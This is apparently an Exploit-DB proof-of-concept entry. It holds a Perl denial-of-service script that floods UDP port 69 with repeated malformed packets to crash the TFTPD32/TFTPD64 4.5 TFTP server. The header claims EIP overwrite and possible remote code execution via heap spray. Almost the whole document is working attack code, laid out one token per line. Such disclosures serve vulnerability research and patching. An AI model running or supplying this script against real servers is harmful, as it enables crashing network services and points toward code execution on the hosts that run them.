# Exploit Title: TFTPD32 4.5 / TFTPD64 4.5 DoS poc
# Date: 13/05/2014
# Exploit Author: j0s3h4x0r
# Homepage: http://tftpd32.jounin.net/tftpd32_testimonials.html
# Software Link: http://tftpd32.jounin.net/download/tftpd32.450.zip
# Version: 4.5 32 bits / 4.5 64 bits
# Tested on: [Windows 7 x64]
#this proof of concept code will crash tftpd32 and tftpd64
#you can try changing $j and $i loop limits
#most of the times EIP reaches 0x2E373231 == "127." or any string contained in tftpd32 error logs
#and sometimes EIP reaches addresses similar to 0x00013200 so Remote Code Execution may be possible using some form of heap-spray
## Exploit-DB Note: $j=5, $i=2500 caused a crash.
#!/usr/bin/perl -w
use
IO::
Socket
;
for
(
my
$j
= 0;
$j
< 2;
$j
++)
{
sleep
(2);
for
(
my
$i
= 0;
$i
< 1500;
$i
++)
{
$st_socket
= IO::
Socket
::INET->new(Proto=>
'udp'
, PeerAddr=>
'127.0.0.1'
, PeerPort=>69) or
die
"connect error"
;
$p_c_buffer
=
"\x0c\x0d"
x 10;
print
$st_socket
$p_c_buffer
;
close
(
$st_socket
);
print
"sent "
.
$i
.
"\n"
;
}
}
exit
;